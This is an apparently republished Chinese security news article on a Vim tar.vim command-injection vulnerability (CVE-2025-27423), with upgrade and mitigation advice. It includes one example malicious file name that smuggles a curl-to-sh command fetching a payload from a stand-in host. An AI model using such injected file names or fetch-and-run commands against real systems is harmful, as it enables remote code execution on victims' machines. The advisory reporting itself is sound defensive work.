freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vim 编辑器漏洞:恶意 TAR 文件触发代码执行风险
2025-03-05 10:15:02
所属地 上海

image

Vim 文本编辑器的漏洞 CVE-2025-27423 是一个高严重性问题,攻击者可以通过恶意 TAR 文件实现任意代码执行。该漏洞影响 Vim 9.1.1164 之前的版本,涉及 tar.vim 插件,当用户处理特制的 TAR 文件时,可能导致命令注入攻击。该漏洞于 2025 年 3 月修复,暴露了文件处理流程中输入验证的关键缺陷。

攻击机制详解

tar.vim 插件自 2004 年起随 Vim 标准版本发布,用户无需手动解压即可直接编辑 TAR 文件。然而,2024 年 11 月的更新(提交记录 129a844)虽然增强了文件权限处理功能,却意外引入了注入向量。

插件修改后的:read命令未能对从档案元数据中提取的文件名进行清理,使攻击者能够在文件名中嵌入 shell 元字符,如;|&&。当用户打开恶意 TAR 文件时,tar.vim 会使用未清理的文件名数据构建系统命令字符串。

例如,如果文件名为legit_file.txt; curl http://malicious.site/payload.sh | sh,攻击者的负载执行命令会被附加到 Vim 的:read管道中。命令执行依赖于用户配置的 shell(由 Vim 的shell选项定义,默认值为$SHELL),因此攻击成功与否取决于 shell 是否支持命令链接。

该漏洞的 CVSSv4 评分为 8.1,属于高严重性,需要用户主动打开恶意档案进行触发。虽然明显的文件名异常(例如文件名中包含分号)可能会引起警惕用户的注意,但高级攻击可以通过隐藏负载绕过检测。

影响范围与应对措施

该漏洞的影响不仅限于个人工作站。使用 Vim 进行日志检查的开发环境、解析 CI/CD 流水线中的构件或自动化 vimdiff 档案对比的系统都面临较高的风险。GMO Flatt Security 分析师 Ry0taK 发现了这一漏洞。

为应对此问题,Vim 项目发布了 9.1.1164 版本,使用基于正则表达式的过滤对文件名进行严格清理。建议用户立即采取以下措施:

  • 通过官方包管理器升级 Vim(如apt upgrade vimbrew update vim)。
  • 使用命令vim --version | grep 9.1.1164确认安装版本。
  • 对于无法立即修补的系统,可以通过在~/.vimrc中添加let g:loaded_tar = 1禁用 tar.vim 插件。

此外,用户可以将 shell 临时设置为/bin/dash,以限制其功能。作为最佳实践,Vim 用户应优先更新并审核第三方插件,尤其是处理不受信任文件格式的插件。随着供应链攻击的日益复杂,开发者在 Vim 中访问档案的便利性需要更加谨慎。

目前,GitHub 上已出现漏洞的概念验证利用,建议用户持续监控。虽然主流杀毒引擎已能检测恶意 TAR 文件,但系统管理员仍需结合补丁与用户教育,以识别可疑档案内容,构建多层防御体系,从而有效缓解社交工程攻击的威胁。

参考来源:

Vim Editor Vulnerability Exploited Via TAR Files to Trigger Code Execution

# 终端安全 # 安全管理
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录